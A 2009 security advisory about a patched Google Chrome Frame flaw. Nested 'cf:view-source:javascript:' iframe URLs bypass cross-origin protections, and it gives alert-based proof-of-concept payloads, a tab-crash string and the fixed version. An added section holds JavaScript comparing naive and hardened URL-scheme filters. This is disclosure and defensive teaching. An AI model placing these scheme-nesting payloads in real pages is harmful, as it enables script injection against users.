#####################################
Google Chrome Frame null domain XSS
Vendor URL: http://www.google.com/chromeframe
Vendor changelog: http://googlechromereleases.blogspot.com/2009/11/google-chrome-frame-update-bug-fixes.html
Advisory: http://lostmon.blogspot.com/2009/11/google-chrome-frame-null-domain-xss.html
Vendor notified: yes Exploit available: YES
######################################
######################
Description by vendor
######################
Google Chrome Frame is a free plug-in for Internet Explorer.
Some advanced web apps, like Google Wave, use Google Chrome
Frame to provide you with additional features and better performance.
Google Chrome Frame is an early-stage open source
plug-in that seamlessly brings Google Chrome's open
web technologies and speedy JavaScript engine to
Internet Explorer.
################
Version affected
################
4.0.223.9 (Official Build 29618)
WebKit: 532.3
V8: 1.3.16
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3
Not affected version:
4.0.245.1 (Official Build 31970)
WebKit: 532.5
V8: 1.3.18.6
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5
You can find additional information here:
http://googlechromereleases.blogspot.com/2009/11/google-chrome-frame-update-bug-fixes.html
#####################
Cross-site scripting
#####################
Create an HTML document and some tests =>
<iframe src="javascript:alert(1)"></iframe>
=> this opens the iframe and executes the alert
(this is correct)
<iframe src="cf:javascript:alert(1)"></iframe>
This does not work, it does not show the alert (correct).
And here is the flaw =>
<iframe src="cf:view-source:javascript:alert(1)"></iframe>
This shows and executes the alert; it works in a local and a remote
scenario, or via the address bar too.
This bypassed cross-origin protections!!!
For the Google Chrome browser, test this
at the address bar =>
view-source:javascript:alert(1)
This executes the alert, but recently Google has made changes
to the about:blank page and this issue is only exploitable
via the address bar, not in an iframe or frame or HTML document,
so for that I think this issue isn't exploitable in a
remote scenario.
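The three test cases above share one pattern: a check that looks only at the outermost URL scheme (cf:, then view-source:) never sees the javascript: scheme nested inside. The following is an added example, not code from the advisory or from Chrome Frame, showing a naive outermost-scheme check beside a hardened check that peels wrapper schemes until it reaches the innermost one. The wrapper list (cf:, view-source:), the blocked-scheme list, the function names and the http sample URL are assumptions made for illustration.

```javascript
// Added example (not from the advisory): a scheme check for frame/link
// targets that looks through wrapper schemes. The wrapper list, the
// blocked-scheme list and the function names are assumptions for
// illustration, not Chrome Frame's own code.

// Schemes that merely wrap another URL; the inner URL is what gets acted on.
// "cf:" is the Chrome Frame prefix used in the advisory's test cases and
// "view-source:" is the browser's source viewer.
const WRAPPER_SCHEMES = ["cf", "view-source"];

// Schemes that run script or embed content and should never be reachable
// from a frame src or link target (assumed list).
const SCRIPT_SCHEMES = ["javascript", "vbscript", "data"];

// Extract the leading scheme of a URL, normalised: lower-cased, with
// whitespace and control characters removed, since browsers strip those
// before interpreting the scheme.
function leadingScheme(url) {
  const cleaned = url.replace(/[\s\u0000-\u001f]/g, "").toLowerCase();
  const m = cleaned.match(/^([a-z][a-z0-9+.-]*):/);
  return m ? { scheme: m[1], rest: cleaned.slice(m[0].length) } : null;
}

// Naive check: inspects only the outermost scheme. This is the shape of
// logic the advisory's third test case gets past, because the outer scheme
// of "cf:view-source:javascript:..." is "cf", not "javascript".
function naiveIsSafe(url) {
  const lead = leadingScheme(url);
  return !(lead && SCRIPT_SCHEMES.includes(lead.scheme));
}

// Hardened check: peel wrapper schemes until a non-wrapper scheme (or no
// scheme at all) remains, then decide on that innermost scheme. The chain
// of unwrapped schemes is returned so a caller can log what was seen.
function hardenedIsSafe(url, maxDepth = 8) {
  let current = url;
  const chain = [];
  for (let depth = 0; depth < maxDepth; depth++) {
    const lead = leadingScheme(current);
    if (!lead) return { safe: true, chain }; // relative URL, no scheme left
    chain.push(lead.scheme);
    if (SCRIPT_SCHEMES.includes(lead.scheme)) return { safe: false, chain };
    if (!WRAPPER_SCHEMES.includes(lead.scheme)) return { safe: true, chain };
    current = lead.rest; // unwrap one layer and look again
  }
  // Too many nested wrappers: refuse rather than guess.
  return { safe: false, chain };
}

// The three src values from the advisory plus one ordinary http URL
// (constructed sample; the host is a reserved example name).
const SAMPLES = [
  "javascript:alert(1)",
  "cf:javascript:alert(1)",
  "cf:view-source:javascript:alert(1)",
  "http://example.invalid/page.html",
];

// Side-by-side verdict of both checks for one URL.
function compare(url) {
  return { url, naive: naiveIsSafe(url), hardened: hardenedIsSafe(url).safe };
}

if (typeof require !== "undefined" && require.main === module) {
  for (const s of SAMPLES) console.log(compare(s));
}

if (typeof module !== "undefined") {
  module.exports = { leadingScheme, naiveIsSafe, hardenedIsSafe, compare, SAMPLES };
}
```

Running the block prints one line per sample; the only disagreement between the two checks is the nested cf:view-source:javascript: form, which the naive check accepts and the hardened check rejects. The hardened check also rejects cf:javascript:, which the advisory reports as already blocked by the plug-in: a filter sitting in front of a URL handler should refuse a script scheme at any depth rather than rely on the handler to do so.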
###########
crashes
###########
cf:view-source:about@: crash
cf:about@: => crashing the tab
##########
Solution
############
Google has automatically released a new version
of Chrome Frame 4.0.245.1 (Official Build 31970)
and this version is not affected.
#################End#############
Thanks to estrella for being my light
Thanks to icar0 & sha0 from Badchecksum
Thanks to the Google Security Team
Sincerely:
Security Research & Analysis.
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
Thursday, November 19, 2009